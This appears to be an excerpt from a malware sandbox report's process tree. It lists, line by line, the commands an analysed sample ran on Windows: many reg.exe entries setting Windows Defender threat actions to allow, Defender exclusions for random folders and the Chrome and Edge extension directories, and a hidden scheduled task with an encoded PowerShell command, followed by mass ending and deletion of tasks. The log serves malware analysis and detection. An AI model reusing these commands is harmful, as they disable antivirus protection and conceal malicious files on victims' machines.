C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EkAcBLsehYBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EkAcBLsehYBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LjPBjCkxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LjPBjCkxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WEPOREuymMJJC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WEPOREuymMJJC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yyjtaGBLEqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yyjtaGBLEqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PtxASTBQXXYOENVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PtxASTBQXXYOENVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dkHlCbgnIThowMMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dkHlCbgnIThowMMU\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PtxASTBQXXYOENVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PtxASTBQXXYOENVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dkHlCbgnIThowMMU /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dkHlCbgnIThowMMU /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXqmKbDRR" /SC once /ST 04:10:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXqmKbDRR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXqmKbDRR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iYllYzWOsJAFFfwAw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iYllYzWOsJAFFfwAw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fPtQZVBGyPdaKQTOv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fPtQZVBGyPdaKQTOv2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BCnLzkyOLZmLmIzwE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BCnLzkyOLZmLmIzwE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KuLOMfOQwGIIxjPQo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KuLOMfOQwGIIxjPQo2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QpHLEFsCJKnqdWiFQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QpHLEFsCJKnqdWiFQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JjLlOQoXGuQPCUatX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JjLlOQoXGuQPCUatX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ahBPwJtarfivgyQCX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ahBPwJtarfivgyQCX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ahBPwJtarfivgyQCX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ahBPwJtarfivgyQCX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dSEsiSMbbyMjmgUXi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dSEsiSMbbyMjmgUXi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lxqfHZMYglidBLlwk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lxqfHZMYglidBLlwk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lxqfHZMYglidBLlwk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lxqfHZMYglidBLlwk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GgtgzPiQnzQTXdKHD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GgtgzPiQnzQTXdKHD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hSKXczqQgUSiKyBIq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hSKXczqQgUSiKyBIq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "USQKnjDrryqfkhdiY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "USQKnjDrryqfkhdiY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "USQKnjDrryqfkhdiY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "USQKnjDrryqfkhdiY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yUsQetiTYqwFtrFXE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yUsQetiTYqwFtrFXE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oNisdINIjIDgGJWJp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oNisdINIjIDgGJWJp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oNisdINIjIDgGJWJp2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oNisdINIjIDgGJWJp2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FflikJmsVSrpAnzdm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FflikJmsVSrpAnzdm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FflikJmsVSrpAnzdm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FflikJmsVSrpAnzdm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bhrRzeLjFMONelYUe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhrRzeLjFMONelYUe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bhrRzeLjFMONelYUe2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhrRzeLjFMONelYUe2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zFCxEKyYfHZqHRxXg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zFCxEKyYfHZqHRxXg2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tRrjoTQcDsRkclAsy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tRrjoTQcDsRkclAsy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zoWzbtLxqmMmTAlSq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zoWzbtLxqmMmTAlSq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DRTidHIeKPheRAMyM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DRTidHIeKPheRAMyM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DRTidHIeKPheRAMyM2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DRTidHIeKPheRAMyM2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FbVloGRvRXpHpvUoC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FbVloGRvRXpHpvUoC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DmubMkhxcDoElzROBpi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DmubMkhxcDoElzROBpi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gTSPEAyXWRBkgECtlmW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gTSPEAyXWRBkgECtlmW2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DgPohQYoFstDEAukEvE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DgPohQYoFstDEAukEvE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pUflfRSniGOrkEioyUk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pUflfRSniGOrkEioyUk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "myNYhcWULdyyuqVeOLR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "myNYhcWULdyyuqVeOLR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lAtvBWBhjAuAUSkhaQr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lAtvBWBhjAuAUSkhaQr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JknGisNDLGEJSyipVcP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JknGisNDLGEJSyipVcP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YymCzRAEFuptGYVgYyY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YymCzRAEFuptGYVgYyY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "axFcpconfnvMPcfoPBw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "axFcpconfnvMPcfoPBw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TbObhCfvGhvWYtTlxMQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TbObhCfvGhvWYtTlxMQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pmOjfgpJgprtFswRBIC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pmOjfgpJgprtFswRBIC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC2"2⤵
-
